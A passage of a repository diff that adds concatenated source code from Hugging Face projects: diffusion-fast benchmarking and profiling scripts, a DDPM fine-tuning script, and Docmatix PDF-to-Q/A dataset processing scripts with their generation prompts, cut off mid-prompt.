+ name = args.ckpt.replace('/', '_') + f'bf16@{not args.no_bf16}-sdpa@{not args.no_sdpa}-bs@{args.batch_size}-fuse@{args.enable_fused_projections}-upcast_vae@{args.upcast_vae}-steps@{args.num_inference_steps}-unet@{args.compile_unet}-vae@{args.compile_vae}-mode@{args.compile_mode}-change_comp_config@{args.change_comp_config}-do_quant@{args.do_quant}-tag@{args.tag}-device@{args.device}.csv'
92
+ img.save(f"{name.replace('.csv', '')}.jpeg")
93
+ write_to_csv(name, data_dict)
94
+
95
+ # File: diffusion-fast-main/run_benchmark_pixart.py
96
+ import torch
97
+ torch.set_float32_matmul_precision('high')
98
+ import sys
99
+ sys.path.append('.')
100
+ from utils.benchmarking_utils import benchmark_fn, create_parser, generate_csv_dict, write_to_csv
101
+ from utils.pipeline_utils_pixart import load_pipeline
102
+
103
+ def run_inference(pipe, args):
104
+ _ = pipe(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size)
105
+
106
+ def main(args) -> dict:
107
+ pipeline = load_pipeline(ckpt=args.ckpt, compile_transformer=args.compile_transformer, compile_vae=args.compile_vae, no_sdpa=args.no_sdpa, no_bf16=args.no_bf16, enable_fused_projections=args.enable_fused_projections, do_quant=args.do_quant, compile_mode=args.compile_mode, change_comp_config=args.change_comp_config, device=args.device)
108
+ run_inference(pipeline, args)
109
+ run_inference(pipeline, args)
110
+ run_inference(pipeline, args)
111
+ time = benchmark_fn(run_inference, pipeline, args)
112
+ data_dict = generate_csv_dict(pipeline_cls=str(pipeline.__class__.__name__), args=args, time=time)
113
+ img = pipeline(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size).images[0]
114
+ return (data_dict, img)
115
+ if __name__ == '__main__':
116
+ parser = create_parser(is_pixart=True)
117
+ args = parser.parse_args()
118
+ print(args)
119
+ (data_dict, img) = main(args)
120
+ name = args.ckpt.replace('/', '_') + f'bf16@{not args.no_bf16}-sdpa@{not args.no_sdpa}-bs@{args.batch_size}-fuse@{args.enable_fused_projections}-upcast_vae@NA-steps@{args.num_inference_steps}-transformer@{args.compile_transformer}-vae@{args.compile_vae}-mode@{args.compile_mode}-change_comp_config@{args.change_comp_config}-do_quant@{args.do_quant}-tag@{args.tag}-device@{args.device}.csv'
121
+ img.save(f'{name}.jpeg')
122
+ write_to_csv(name, data_dict, is_pixart=True)
123
+
124
+ # File: diffusion-fast-main/run_profile.py
125
+ import torch
126
+ torch.set_float32_matmul_precision('high')
127
+ from torch._inductor import config as inductorconfig
128
+ inductorconfig.triton.unique_kernel_names = True
129
+ import functools
130
+ import sys
131
+ sys.path.append('.')
132
+ from utils.benchmarking_utils import create_parser
133
+ from utils.pipeline_utils import load_pipeline
134
+
135
+ def profiler_runner(path, fn, *args, **kwargs):
136
+ with torch.profiler.profile(activities=[torch.profiler.ProfilerActivity.CPU, torch.profiler.ProfilerActivity.CUDA], record_shapes=True) as prof:
137
+ result = fn(*args, **kwargs)
138
+ prof.export_chrome_trace(path)
139
+ return result
140
+
141
+ def run_inference(pipe, args):
142
+ _ = pipe(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size)
143
+
144
+ def main(args) -> dict:
145
+ pipeline = load_pipeline(ckpt=args.ckpt, compile_unet=args.compile_unet, compile_vae=args.compile_vae, no_sdpa=args.no_sdpa, no_bf16=args.no_bf16, upcast_vae=args.upcast_vae, enable_fused_projections=args.enable_fused_projections, do_quant=args.do_quant, compile_mode=args.compile_mode, change_comp_config=args.change_comp_config, device=args.device)
146
+ run_inference(pipeline, args)
147
+ run_inference(pipeline, args)
148
+ trace_path = args.ckpt.replace('/', '_') + f'bf16@{not args.no_bf16}-sdpa@{not args.no_sdpa}-bs@{args.batch_size}-fuse@{args.enable_fused_projections}-upcast_vae@{args.upcast_vae}-steps@{args.num_inference_steps}-unet@{args.compile_unet}-vae@{args.compile_vae}-mode@{args.compile_mode}-change_comp_config@{args.change_comp_config}-do_quant@{args.do_quant}-device@{args.device}.json'
149
+ runner = functools.partial(profiler_runner, trace_path)
150
+ with torch.autograd.profiler.record_function('sdxl-brrr'):
151
+ runner(run_inference, pipeline, args)
152
+ return trace_path
153
+ if __name__ == '__main__':
154
+ parser = create_parser()
155
+ args = parser.parse_args()
156
+ if not args.compile_unet:
157
+ args.compile_mode = 'NA'
158
+ trace_path = main(args)
159
+ print(f'Trace generated at: {trace_path}')
160
+
huggingface_diffusion-models-class.txt ADDED
@@ -0,0 +1,62 @@
1
+ # File: diffusion-models-class-main/unit2/finetune_model.py
2
+ import wandb
3
+ import numpy as np
4
+ import torch, torchvision
5
+ import torch.nn.functional as F
6
+ from PIL import Image
7
+ from tqdm.auto import tqdm
8
+ from fastcore.script import call_parse
9
+ from torchvision import transforms
10
+ from diffusers import DDPMPipeline
11
+ from diffusers import DDIMScheduler
12
+ from datasets import load_dataset
13
+ from matplotlib import pyplot as plt
14
+
15
+ @call_parse
16
+ def train(image_size=256, batch_size=16, grad_accumulation_steps=2, num_epochs=1, start_model='google/ddpm-bedroom-256', dataset_name='huggan/wikiart', device='cuda', model_save_name='wikiart_1e', wandb_project='dm_finetune', log_samples_every=250, save_model_every=2500):
17
+ wandb.init(project=wandb_project, config=locals())
18
+ image_pipe = DDPMPipeline.from_pretrained(start_model)
19
+ image_pipe.to(device)
20
+ sampling_scheduler = DDIMScheduler.from_config(start_model)
21
+ sampling_scheduler.set_timesteps(num_inference_steps=50)
22
+ dataset = load_dataset(dataset_name, split='train')
23
+ preprocess = transforms.Compose([transforms.Resize((image_size, image_size)), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize([0.5], [0.5])])
24
+
25
+ def transform(examples):
26
+ images = [preprocess(image.convert('RGB')) for image in examples['image']]
27
+ return {'images': images}
28
+ dataset.set_transform(transform)
29
+ train_dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
30
+ optimizer = torch.optim.AdamW(image_pipe.unet.parameters(), lr=1e-05)
31
+ scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.9)
32
+ for epoch in range(num_epochs):
33
+ for (step, batch) in tqdm(enumerate(train_dataloader), total=len(train_dataloader)):
34
+ clean_images = batch['images'].to(device)
35
+ noise = torch.randn(clean_images.shape).to(clean_images.device)
36
+ bs = clean_images.shape[0]
37
+ timesteps = torch.randint(0, image_pipe.scheduler.num_train_timesteps, (bs,), device=clean_images.device).long()
38
+ noisy_images = image_pipe.scheduler.add_noise(clean_images, noise, timesteps)
39
+ noise_pred = image_pipe.unet(noisy_images, timesteps, return_dict=False)[0]
40
+ loss = F.mse_loss(noise_pred, noise)
41
+ wandb.log({'loss': loss.item()})
42
+ loss.backward()
43
+ if (step + 1) % grad_accumulation_steps == 0:
44
+ optimizer.step()
45
+ optimizer.zero_grad()
46
+ if (step + 1) % log_samples_every == 0:
47
+ x = torch.randn(8, 3, 256, 256).to(device)
48
+ for (i, t) in tqdm(enumerate(sampling_scheduler.timesteps)):
49
+ model_input = sampling_scheduler.scale_model_input(x, t)
50
+ with torch.no_grad():
51
+ noise_pred = image_pipe.unet(model_input, t)['sample']
52
+ x = sampling_scheduler.step(noise_pred, t, x).prev_sample
53
+ grid = torchvision.utils.make_grid(x, nrow=4)
54
+ im = grid.permute(1, 2, 0).cpu().clip(-1, 1) * 0.5 + 0.5
55
+ im = Image.fromarray(np.array(im * 255).astype(np.uint8))
56
+ wandb.log({'Sample generations': wandb.Image(im)})
57
+ if (step + 1) % save_model_every == 0:
58
+ image_pipe.save_pretrained(model_save_name + f'step_{step + 1}')
59
+ scheduler.step()
60
+ image_pipe.save_pretrained(model_save_name)
61
+ wandb.finish()
62
+
huggingface_distil-whisper.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_docmatix.txt ADDED
@@ -0,0 +1,604 @@
1
+ # File: docmatix-main/analysis/count_words_in_dataset.py
2
+ from collections import Counter
3
+ import string
4
+
5
+ def count_words(df, column_name):
6
+ overall_counter = Counter()
7
+ word_counts = []
8
+ for text in df[column_name]:
9
+ text = text.translate(str.maketrans(string.punctuation, ' ' * len(string.punctuation)))
10
+ words = text.lower().split()
11
+ word_count = len(words)
12
+ word_counts.append(word_count)
13
+ overall_counter.update(words)
14
+ df['word_count'] = word_counts
15
+ most_common_words = overall_counter.most_common(100)
16
+ return (df, most_common_words)
17
+
18
+ # File: docmatix-main/analysis/plot.py
19
+ import matplotlib.pyplot as plt
20
+ import pandas as pd
21
+ import seaborn as sns
22
+ analysis_df = pd.read_json('prompt_analysis_results.json', orient='records', lines=True)
23
+ sns.set(style='whitegrid')
24
+ plt.figure(figsize=(16, 12))
25
+ plt.subplot(3, 2, 1)
26
+ sns.barplot(x='Prompt ID', y='Number of Q/A pairs', data=analysis_df, palette='viridis')
27
+ plt.title('Number of Q/A pairs per Prompt ID')
28
+ plt.xlabel('Prompt ID')
29
+ plt.ylabel('Number of Q/A pairs')
30
+ for (i, row) in analysis_df.iterrows():
31
+ plt.text(i, row['Number of Q/A pairs'], f"{row['Number of Q/A pairs'] / 1000000.0:.2f}e6", ha='center', va='bottom')
32
+ plt.subplot(3, 2, 2)
33
+ sns.barplot(x='Prompt ID', y='Average answer length', data=analysis_df, palette='viridis')
34
+ plt.title('Average Answer Length per Prompt ID')
35
+ plt.xlabel('Prompt ID')
36
+ plt.ylabel('Average Answer Length')
37
+ for (i, row) in analysis_df.iterrows():
38
+ plt.text(i, row['Average answer length'], f"{row['Average answer length']:.2f}", ha='center', va='bottom')
39
+ plt.subplot(3, 2, 3)
40
+ sns.barplot(x='Prompt ID', y='Diversity within documents', data=analysis_df, palette='viridis')
41
+ plt.title('Diversity within Documents per Prompt ID')
42
+ plt.xlabel('Prompt ID')
43
+ plt.ylabel('Diversity within Documents')
44
+ for (i, row) in analysis_df.iterrows():
45
+ plt.text(i, row['Diversity within documents'], f"{row['Diversity within documents']:.2f}", ha='center', va='bottom')
46
+ plt.subplot(3, 2, 4)
47
+ sns.barplot(x='Prompt ID', y='Total empty questions', data=analysis_df, palette='viridis')
48
+ plt.title('Total Empty Questions per Prompt ID')
49
+ plt.xlabel('Prompt ID')
50
+ plt.ylabel('Total Empty Questions')
51
+ for (i, row) in analysis_df.iterrows():
52
+ plt.text(i, row['Total empty questions'], f"{row['Total empty questions']}", ha='center', va='bottom')
53
+ plt.subplot(3, 2, 5)
54
+ sns.barplot(x='Prompt ID', y='Average Q/A pairs per page', data=analysis_df, palette='viridis')
55
+ plt.title('Average Q/A pairs per Page per Prompt ID')
56
+ plt.xlabel('Prompt ID')
57
+ plt.ylabel('Average Q/A pairs per Page')
58
+ for (i, row) in analysis_df.iterrows():
59
+ plt.text(i, row['Average Q/A pairs per page'], f"{row['Average Q/A pairs per page']:.2f}", ha='center', va='bottom')
60
+ plt.subplot(3, 2, 6)
61
+ sns.barplot(x='Prompt ID', y='Number of unique questions', data=analysis_df, palette='viridis')
62
+ plt.title('Number of unique questions per Prompt ID')
63
+ plt.xlabel('Prompt ID')
64
+ plt.ylabel('Number of unique questions')
65
+ for (i, row) in analysis_df.iterrows():
66
+ plt.text(i, row['Number of unique questions'], f"{row['Number of unique questions'] / 1000000.0:.2f}e6", ha='center', va='bottom')
67
+ plt.tight_layout()
68
+ plt.savefig('prompt_analysis_plots_enhanced.png')
69
+ plt.show()
70
+ report = f"\nPrompt Analysis Report\n=======================\nNumber of Q/A pairs per Prompt ID:\n{analysis_df[['Prompt ID', 'Number of Q/A pairs']]}\n\nAverage answer length per Prompt ID:\n{analysis_df[['Prompt ID', 'Average answer length']]}\n\nUnique questions per Prompt ID:\n{analysis_df[['Prompt ID', 'Number of unique questions']]}\n\nTotal pages per Prompt ID:\n{analysis_df[['Prompt ID', 'Total pages']]}\n\nAverage Q/A pairs per page per Prompt ID:\n{analysis_df[['Prompt ID', 'Average Q/A pairs per page']]}\n\nAverage answer length per page per Prompt ID:\n{analysis_df[['Prompt ID', 'Average answer length per page']]}\n\nDiversity within documents per Prompt ID:\n{analysis_df[['Prompt ID', 'Diversity within documents']]}\n\nTotal empty questions per Prompt ID:\n{analysis_df[['Prompt ID', 'Total empty questions']]}\n\n"
71
+ with open('prompt_analysis_report.txt', 'w') as f:
72
+ f.write(report)
73
+ print('Report and plots generated successfully.')
74
+
75
+ # File: docmatix-main/clean_and_create/load_data.py
76
+ import os
77
+ import re
78
+ import io
79
+ from io import BytesIO
80
+ import pandas as pd
81
+ import datasets
82
+ from pdf2image import convert_from_bytes
83
+ from tqdm import tqdm
84
+ from concurrent.futures import ThreadPoolExecutor
85
+ import argparse
86
+ import fitz
87
+ import PIL.Image
88
+ tqdm.pandas(desc='Pandas apply progress')
89
+ fitz.TOOLS.mupdf_display_errors(False)
90
+ DATA_PATH = '/fsx/andi/pdfa_data/'
91
+ TAR_FILE_PATTERN = 'pdfa-eng-train-{:06d}.tar'
92
+
93
+ def resize_large_images(image, max_image_size=2940):
94
+ (width, height) = image.size
95
+ aspect_ratio = width / height
96
+ resized = False
97
+ if width >= height and width > max_image_size:
98
+ width = max_image_size
99
+ height = int(width / aspect_ratio)
100
+ resized = True
101
+ elif height > width and height > max_image_size:
102
+ height = max_image_size
103
+ width = int(height * aspect_ratio)
104
+ resized = True
105
+ if resized:
106
+ image = image.resize((width, height), PIL.Image.LANCZOS)
107
+ return image
108
+
109
+ def _decode_pdf_pages(sample):
110
+ try:
111
+ image_fmt = 'L'
112
+ with io.BytesIO(sample) as b:
113
+ doc = fitz.Document(stream=b)
114
+ num_image_pages = doc.page_count
115
+ decoded_image_pages = []
116
+ for page_index in range(num_image_pages):
117
+ page = doc.load_page(page_index)
118
+ pixmap = page.get_pixmap(dpi=150)
119
+ page_image = PIL.Image.frombuffer('RGB', (pixmap.width, pixmap.height), pixmap.samples)
120
+ page_image = resize_large_images(page_image.convert(image_fmt))
121
+ decoded_image_pages += [page_image]
122
+ return decoded_image_pages
123
+ except Exception as e:
124
+ print(f'Error decoding pdf pages: {e}')
125
+ return None
126
+
127
+ def convert_img_to_png_bytes(img):
128
+ with BytesIO() as buffer:
129
+ img.save(buffer, format='PNG')
130
+ return buffer.getvalue()
131
+
132
+ def process_images(pdf_bytes):
133
+ images = convert_from_bytes(pdf_bytes, dpi=150)
134
+ return [convert_img_to_png_bytes(resize_large_images(img)) for img in images]
135
+
136
+ def is_valid_question_or_answer(text):
137
+ if not text or text.strip() == '':
138
+ return False
139
+ patterns = ['\\{.*?\\}', '\\[.*?\\]', '<.*?>', '\\b\\d{1,3}(\\.\\d{1,3}){3}\\b', '\\w+\\.\\w+', '\\n\\s*\\n', 'unanswerable', 'Q\\d+: ', 'A\\d+: ']
140
+ return not any((re.search(pattern, text, re.IGNORECASE) for pattern in patterns))
141
+
142
+ def process_group(key_group):
143
+ try:
144
+ (key, group) = key_group
145
+ qa_pairs = []
146
+ for (_, row) in group.iterrows():
147
+ question = re.sub('^Q\\d+: ', '', row['question'])
148
+ answer = re.sub('^A\\d+: ', '', row['answer'])
149
+ if is_valid_question_or_answer(question) and is_valid_question_or_answer(answer):
150
+ qa_pairs.append({'user': question, 'assistant': answer, 'source': 'PDFA key: ' + str(row['__key__'])})
151
+ if qa_pairs:
152
+ return {'texts': qa_pairs, 'images': group['pdf'].iloc[0]}
153
+ except Exception as e:
154
+ print(f'Error processing group {key}: {e}')
155
+ return None
156
+
157
+ def process_tar_index(tar_index, step_size, question_answer_df):
158
+ shard_nr = tar_index // step_size
159
+ loaded_datasets = []
160
+ for inner_idx in range(step_size):
161
+ tar_file = os.path.join(DATA_PATH, TAR_FILE_PATTERN.format(tar_index + inner_idx))
162
+ try:
163
+ print(f'Loading dataset from: {tar_file}')
164
+ hf_dataset = datasets.load_dataset('webdataset', split='train', data_files=tar_file, cache_dir='/fsx/.cache').to_pandas()
165
+ hf_dataset.__key__ = hf_dataset.__key__.apply(pd.to_numeric)
166
+ loaded_datasets.append(hf_dataset)
167
+ except Exception as e:
168
+ print(f'Error loading dataset from: {tar_file}')
169
+ print(e)
170
+ hf_dataset = pd.concat(loaded_datasets, ignore_index=True)
171
+ print(f'Concatenated datasets with {len(hf_dataset)} samples')
172
+ hf_dataset = hf_dataset[hf_dataset['__key__'].isin(question_answer_df['__key__'].unique())]
173
+ df_data = pd.DataFrame({'key': []})
174
+ if os.path.exists(f'/fsx/m4/datasets/large_docvqa/shard_{shard_nr}'):
175
+ print('using saved data')
176
+ df_data = datasets.load_from_disk(f'/fsx/m4/datasets/large_docvqa/shard_{shard_nr}').to_pandas()
177
+ df_data['__key__'] = df_data.texts.apply(lambda x: x[0]['source'].split('_')[1])
178
+ df_data['__key__'] = df_data['__key__'].apply(pd.to_numeric)
179
+ df_data.drop(columns=['texts'], inplace=True)
180
+ hf_dataset = hf_dataset[hf_dataset['__key__'].isin(df_data['__key__'].unique())]
181
+ hf_dataset = pd.merge(hf_dataset, df_data, on='__key__', how='inner')
182
+ hf_dataset['pdf'] = hf_dataset['images']
183
+ hf_dataset.drop(columns=['images'], inplace=True)
184
+ del df_data
185
+ else:
186
+ hf_dataset['pdf'] = hf_dataset['pdf'].progress_apply(lambda x: process_images(x))
187
+ hf_dataset = hf_dataset[~hf_dataset['pdf'].isnull()]
188
+ merged_df = pd.merge(hf_dataset, question_answer_df, on='__key__', how='inner')
189
+ data_extracted = []
190
+ max_threads = 10
191
+ with ThreadPoolExecutor(max_threads) as executor:
192
+ results = list(tqdm(executor.map(process_group, merged_df.groupby('__key__')), desc='Extracting data', total=len(merged_df['__key__'].unique())))
193
+ data_extracted.extend(results)
194
+ data_extracted = list(filter(lambda item: item is not None, data_extracted))
195
+ FEATURES = datasets.Features({'images': datasets.Sequence(datasets.Image(decode=True)), 'texts': [{'user': datasets.Value('string'), 'assistant': datasets.Value('string'), 'source': datasets.Value('string')}]})
196
+
197
+ def data_generator():
198
+ for data_dict in data_extracted:
199
+ yield data_dict
200
+ ds_shard = datasets.Dataset.from_generator(data_generator, features=FEATURES, writer_batch_size=100, cache_dir='/fsx/.cache')
201
+ ds_shard.save_to_disk(f'/fsx/m4/datasets/docvqa_instruct/shard_{shard_nr}')
202
+
203
+ def load_and_concatenate_dataframes():
204
+ if os.path.exists('concatenated_synthetic_dataset.parquet.gzip'):
205
+ return pd.read_parquet('concatenated_synthetic_dataset.parquet.gzip')
206
+ directory = '.'
207
+ all_files = os.listdir(directory)
208
+ h5_files = sorted([f for f in all_files if re.match('synthetic_dataset_batch_\\d+\\.h5$', f)])
209
+ dataframes = []
210
+ for file in tqdm(h5_files, desc='Loading data'):
211
+ file_path = os.path.join(directory, file)
212
+ df = pd.read_hdf(file_path)
213
+ if '__key__' not in df.columns:
214
+ raise ValueError(f'Key column not found in {file_path}')
215
+ df.__key__ = df.__key__.apply(pd.to_numeric)
216
+ dataframes.append(df)
217
+ concatenated_df = pd.concat(dataframes, ignore_index=True)
218
+ concatenated_df.to_parquet('concatenated_synthetic_dataset.parquet.gzip', compression='gzip')
219
+ return concatenated_df
220
+ if __name__ == '__main__':
221
+ parser = argparse.ArgumentParser(description='Process .h5 files and tar indices.')
222
+ parser.add_argument('--start_index', type=int, default=0, help='The starting index for tar processing.')
223
+ parser.add_argument('--step_size', type=int, default=1, help='The step size for tar processing.')
224
+ args = parser.parse_args()
225
+ question_answer_df = load_and_concatenate_dataframes()
226
+ print(len(question_answer_df))
227
+ process_tar_index(args.start_index, args.step_size, question_answer_df=question_answer_df)
228
+
229
+ # File: docmatix-main/create_only_with_pdfs/load_data.py
230
+ import os
231
+ import re
232
+ import pandas as pd
233
+ import datasets
234
+ from tqdm import tqdm
235
+ from concurrent.futures import ThreadPoolExecutor
236
+ import argparse
237
+ tqdm.pandas(desc='Pandas apply progress')
238
+ DATA_PATH = '/fsx/andi/pdfa_data/'
239
+ TAR_FILE_PATTERN = 'pdfa-eng-train-{:06d}.tar'
240
+
241
+ def is_valid_question_or_answer(text):
242
+ if not text or text.strip() == '':
243
+ return False
244
+ patterns = ['\\{.*?\\}', '\\[.*?\\]', '<.*?>', '\\b\\d{1,3}(\\.\\d{1,3}){3}\\b', '\\w+\\.\\w+', '\\n\\s*\\n', 'unanswerable', 'Q\\d+: ', 'A\\d+: ']
245
+ return not any((re.search(pattern, text, re.IGNORECASE) for pattern in patterns))
246
+
247
+ def process_group(key_group):
248
+ try:
249
+ (key, group) = key_group
250
+ qa_pairs = []
251
+ for (_, row) in group.iterrows():
252
+ question = re.sub('^Q\\d+: ', '', row['question'])
253
+ answer = re.sub('^A\\d+: ', '', row['answer'])
254
+ if is_valid_question_or_answer(question) and is_valid_question_or_answer(answer):
255
+ qa_pairs.append({'user': question, 'assistant': answer, 'source': 'PDFA key: ' + str(row['__key__'])})
256
+ if qa_pairs:
257
+ return {'texts': qa_pairs, 'pdf': group['pdf'].iloc[0]}
258
+ except Exception as e:
259
+ print(f'Error processing group {key}: {e}')
260
+ return None
261
+
262
+ def process_tar_index(tar_index, step_size, question_answer_df):
263
+ shard_nr = tar_index // step_size
264
+ loaded_datasets = []
265
+ for inner_idx in range(step_size):
266
+ tar_file = os.path.join(DATA_PATH, TAR_FILE_PATTERN.format(tar_index + inner_idx))
267
+ try:
268
+ print(f'Loading dataset from: {tar_file}')
269
+ hf_dataset = datasets.load_dataset('webdataset', split='train', data_files=tar_file, cache_dir='/fsx/.cache').to_pandas()
270
+ hf_dataset.__key__ = hf_dataset.__key__.apply(pd.to_numeric)
271
+ loaded_datasets.append(hf_dataset)
272
+ except Exception as e:
273
+ print(f'Error loading dataset from: {tar_file}')
274
+ print(e)
275
+ hf_dataset = pd.concat(loaded_datasets, ignore_index=True)
276
+ print(f'Concatenated datasets with {len(hf_dataset)} samples')
277
+ hf_dataset = hf_dataset[hf_dataset['__key__'].isin(question_answer_df['__key__'].unique())]
278
+ merged_df = pd.merge(hf_dataset, question_answer_df, on='__key__', how='inner')
279
+ data_extracted = []
280
+ max_threads = 10
281
+ with ThreadPoolExecutor(max_threads) as executor:
282
+ results = list(tqdm(executor.map(process_group, merged_df.groupby('__key__')), desc='Extracting data', total=len(merged_df['__key__'].unique())))
283
+ data_extracted.extend(results)
284
+ data_extracted = list(filter(lambda item: item is not None, data_extracted))
285
+ FEATURES = datasets.Features({'pdf': datasets.Value('binary'), 'texts': [{'user': datasets.Value('string'), 'assistant': datasets.Value('string'), 'source': datasets.Value('string')}]})
286
+
287
+ def data_generator():
288
+ for data_dict in data_extracted:
289
+ yield data_dict
290
+ ds_shard = datasets.Dataset.from_generator(data_generator, features=FEATURES, writer_batch_size=100, cache_dir='/fsx/.cache')
291
+ ds_shard.save_to_disk(f'/fsx/m4/datasets/docmatix_pdf/shard_{shard_nr}')
292
+
293
+ def load_and_concatenate_dataframes():
294
+ if os.path.exists('/fsx/andi/llm-swarm/concatenated_synthetic_dataset.parquet.gzip'):
295
+ return pd.read_parquet('/fsx/andi/llm-swarm/concatenated_synthetic_dataset.parquet.gzip')
296
+ directory = '.'
297
+ all_files = os.listdir(directory)
298
+ h5_files = sorted([f for f in all_files if re.match('synthetic_dataset_batch_\\d+\\.h5$', f)])
299
+ dataframes = []
300
+ for file in tqdm(h5_files, desc='Loading data'):
301
+ file_path = os.path.join(directory, file)
302
+ df = pd.read_hdf(file_path)
303
+ if '__key__' not in df.columns:
304
+ raise ValueError(f'Key column not found in {file_path}')
305
+ df.__key__ = df.__key__.apply(pd.to_numeric)
306
+ dataframes.append(df)
307
+ concatenated_df = pd.concat(dataframes, ignore_index=True)
308
+ concatenated_df.to_parquet('concatenated_synthetic_dataset.parquet.gzip', compression='gzip')
309
+ return concatenated_df
310
+ if __name__ == '__main__':
311
+ parser = argparse.ArgumentParser(description='Process .h5 files and tar indices.')
312
+ parser.add_argument('--start_index', type=int, default=0, help='The starting index for tar processing.')
313
+ parser.add_argument('--step_size', type=int, default=1, help='The step size for tar processing.')
314
+ args = parser.parse_args()
315
+ question_answer_df = load_and_concatenate_dataframes()
316
+ print(len(question_answer_df))
317
+ process_tar_index(args.start_index, args.step_size, question_answer_df=question_answer_df)
318
+
319
+ # File: docmatix-main/create_only_with_pdfs/upload_data.py
320
+ from datasets import load_from_disk, concatenate_datasets
321
+ from tqdm import tqdm
322
+ import os
323
+
324
+ def get_datasets():
325
+ if os.path.isdir('/fsx/m4/datasets/docmatix_pdf/concatenated'):
326
+ return load_from_disk('/fsx/m4/datasets/docmatix_pdf/concatenated')
327
+ hf_datasets = []
328
+ for shard_nr in tqdm(range(200)):
329
+ try:
330
+ hf_datasets.append(load_from_disk(f'/fsx/m4/datasets/docmatix_pdf/shard_{shard_nr}'))
331
+ except Exception as e:
332
+ print(f'Error loading dataset from: {shard_nr}')
333
+ print(e)
334
+ hf_data = concatenate_datasets(hf_datasets)
335
+ hf_data.save_to_disk('/fsx/m4/datasets/docmatix_pdf/concatenated')
336
+ return hf_data
337
+ data = get_datasets()
338
+ print(data.features)
339
+ print(data[0]['texts'])
340
+ print(data[0]['pdf'][:10])
341
+ print(len(data))
342
+ data.push_to_hub('HuggingFaceM4/Docmatix', 'pdf')
343
+
344
+ # File: docmatix-main/florence_2_dataset/create_florence_2_dataset.py
345
+ from functools import partial
346
+ from datasets import load_from_disk, concatenate_datasets
347
+ from tqdm import tqdm
348
+ import re
349
+ import pandas as pd
350
+ import os
351
+ import datasets
352
+ IMAGE_FEATURES = datasets.Features({'image': datasets.Image(decode=True), '__key__': datasets.Value('int64')})
353
+ TEXT_FEATURES = datasets.Features({'question': datasets.Value('string'), 'answer': datasets.Value('string'), '__key__': datasets.Value('int64')})
354
+
355
+ def text_generator(df_text):
356
+ for (i, row) in df_text.iterrows():
357
+ print(i, row['__key__'])
358
+ yield {'question': row['question'], 'answer': row['answer'], '__key__': row['__key__']}
359
+
360
+ def img_generator(df_img):
361
+ for (i, row) in df_img.iterrows():
362
+ print(i, row['__key__'])
363
+ yield {'image': row['images'][0], '__key__': row['__key__']}
364
+ pre_key_len = len('PDFA key: ')
365
+ for shard_number in tqdm(range(0, 200)):
366
+ try:
367
+ if os.path.exists(f'/fsx/m4/datasets/florence_vqa_instruct/shard_{shard_number}') and os.path.exists(f'/fsx/m4/datasets/florence_vqa_instruct_images/shard_{shard_number}'):
368
+ continue
369
+ df_data = load_from_disk(f'/fsx/m4/datasets/docvqa_instruct/shard_{shard_number}').to_pandas()
370
+ df_data['__key__'] = df_data.texts.apply(lambda x: x[0]['source'][pre_key_len:])
371
+ df_data['__key__'] = df_data['__key__'].apply(pd.to_numeric)
372
+ df_images = df_data[['images', '__key__']].copy()
373
+ df_images = df_images[df_images['images'].apply(len) <= 1]
374
+ df_texts = df_data[['texts']].explode('texts')
375
+ df_texts['question'] = df_texts['texts'].apply(lambda x: x.get('user'))
376
+ df_texts['answer'] = df_texts['texts'].apply(lambda x: x.get('assistant'))
377
+ df_texts['__key__'] = df_texts['texts'].apply(lambda x: x.get('source')[pre_key_len:])
378
+ df_texts['__key__'] = df_texts['__key__'].apply(pd.to_numeric)
379
+ df_texts = df_texts[df_texts['__key__'].isin(df_images['__key__'].unique())]
380
+ df_texts.drop(columns=['texts'], inplace=True)
381
+ df_texts = df_texts[df_texts['question'].apply(lambda x: len(x.split()) <= 900)]
382
+ df_texts = df_texts[df_texts['answer'].apply(lambda x: len(x.split()) <= 900)]
383
+ df_images = df_images[df_images['__key__'].isin(df_texts['__key__'].unique())]
384
+ ds_text = datasets.Dataset.from_generator(partial(text_generator, df_texts), features=TEXT_FEATURES, writer_batch_size=100, cache_dir='/fsx/.cache')
385
+ ds_text.save_to_disk(f'/fsx/m4/datasets/florence_vqa_instruct/shard_{shard_number}')
386
+ df_image = datasets.Dataset.from_generator(partial(img_generator, df_images), features=IMAGE_FEATURES, writer_batch_size=100, cache_dir='/fsx/.cache')
387
+ df_image.save_to_disk(f'/fsx/m4/datasets/florence_vqa_instruct_images/shard_{shard_number}')
388
+ print(f'Finished processing shard: {shard_number}')
389
+ except:
390
+ print(f'shard {shard_number} failed')
391
+ all_ds = []
392
+ for shard in tqdm(range(0, 200)):
393
+ try:
394
+ data = load_from_disk(f'/fsx/m4/datasets/florence_vqa_instruct/shard_{shard}')
395
+ all_ds.append(data)
396
+ except:
397
+ print(f'shard {shard} failed')
398
+ all_ds = concatenate_datasets(all_ds)
399
+ all_ds.save_to_disk('/fsx/m4/datasets/complete_florence_vqa_instruct', num_proc=96)
400
+
401
+ # File: docmatix-main/generation/base_prompts.py
402
+ BASE_PROMPT = '\nYou are reading text extracted from a PDF with several pages. The pages are divided by a line saying \'NEW PAGE\'. \nYour role is to {role_description}. If the type of questions requested are impossible to generate due to the simplicity of the document, default to simpler factual questions.\nThe PDFs might contain tables or images that are poorly parsed in the text. Avoid asking questions about these.\nIf the text seems to only contain uninteresting information, output "unanswerable" as the answer.\nHere are some examples for questions that follow your role:\n{examples}\n'
403
+ BASE_USER_CONTENT = 'The text contained in the PDF is: \n{text} \n\nCreate the question answer pairs following this format:\nQ#: \nA#:\n\nIf you can\'t generate a questions for the text, write "unanswerable" as the answer.\n'
404
+ PROMPTS = [{'role_description': 'understand the content of the PDF and create as many pairs of questions and answers as you need to cover the content of the PDF comprehensively. The questions should be varied, covering factual information, inferences, and deeper analysis of the text.', 'examples': '\n Q1: What is the main topic of the document?\n A1: The main topic of the document is...\n \n Q2: What are the key points discussed in the first section?\n A2: The key points discussed in the first section include...\n\n Q3: How does the author support their argument about X?\n A3: The author supports their argument about X by...\n\n Q4: What can be inferred about Y from the document?\n A4: From the document, it can be inferred that Y...\n\n Q5: What are the implications of Z mentioned in the document?\n A5: The implications of Z mentioned in the document are...\n '}, {'role_description': 'focus on generating enough pairs of questions and answers for each section of the document to ensure a detailed and complete coverage the document.', 'examples': '\n Q1: What is the primary 